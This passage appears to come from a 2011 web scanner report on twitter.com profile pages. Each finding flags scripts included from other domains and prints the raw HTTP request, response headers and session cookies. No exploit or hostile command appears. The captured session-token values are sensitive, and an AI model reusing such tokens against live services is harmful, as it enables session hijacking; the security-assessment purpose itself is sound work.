<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.409. http://twitter.com/dandenney previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/dandenney

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296181158
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /dandenney HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:11:51 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234711-35198-40102
ETag: "8b2e26d3b0f6c8a5ad227c0c35512ccd"
Last-Modified: Fri, 28 Jan 2011 17:11:51 GMT
X-Runtime: 0.00812
Content-Type: text/html; charset=utf-8
Content-Length: 54302
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.410. http://twitter.com/dandenney previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/dandenney

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /dandenney HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:59 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225059-14036-20243
ETag: "b216b5fbcf2d794e1118d2a88b30a946"
Last-Modified: Fri, 28 Jan 2011 14:30:59 GMT
X-Runtime: 0.01217
Content-Type: text/html; charset=utf-8
Content-Length: 54426
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.411. http://twitter.com/danwrong previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/danwrong

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /danwrong HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:11:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234700-81716-17669
ETag: "ed854b28d046d2d11bf9552c270f6d24"
Last-Modified: Fri, 28 Jan 2011 17:11:40 GMT
X-Runtime: 0.00756
Content-Type: text/html; charset=utf-8
Content-Length: 50053
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.412. http://twitter.com/danwrong previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/danwrong

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /danwrong HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:44 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225044-52425-1613
ETag: "e308391ad5a4a27e5094e4fd0c33693a"
Last-Modified: Fri, 28 Jan 2011 14:30:44 GMT
X-Runtime: 0.01151
Content-Type: text/html; charset=utf-8
Content-Length: 50051
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.413. http://twitter.com/davevogler previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/davevogler

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:46 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225046-53952-21746
ETag: "2ad3827a054ebfaafa3ae7d33a059d42"
Last-Modified: Fri, 28 Jan 2011 14:30:46 GMT
X-Runtime: 0.01106
Content-Type: text/html; charset=utf-8
Content-Length: 53247
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.414. http://twitter.com/deionbranch84 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/deionbranch84

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296245718/javascripts/api.js?1296246715
http://a0.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296246715
http://a1.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296246715
http://a1.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296246715
http://a2.twimg.com/a/1296245718/javascripts/dismissable.js?1296246715
http://a2.twimg.com/a/1296245718/javascripts/twitter.js?1296246715
http://a3.twimg.com/a/1296245718/javascripts/geov1.js?1296246715
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:27 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265287-45791-20728
ETag: "cf921750730cd97318f25ed57b09cad3"
Last-Modified: Sat, 29 Jan 2011 01:41:27 GMT
X-Runtime: 0.01145
Content-Type: text/html; charset=utf-8
Content-Length: 50211
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/twitter.js?1296246715" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296246715" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296246715" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296246715" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/geov1.js?1296246715" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/api.js?1296246715" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296246715" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/dismissable.js?1296246715" type="text/javascript"></script>
...[SNIP]...

18.415. http://twitter.com/dougneiner previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/dougneiner

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:13 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225073-41249-57241
ETag: "a0613392b43e537b2e040e0724b95bf7"
Last-Modified: Fri, 28 Jan 2011 14:31:13 GMT
X-Runtime: 0.01266
Content-Type: text/html; charset=utf-8
Content-Length: 53641
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.416. http://twitter.com/ebello previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/ebello

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /ebello HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
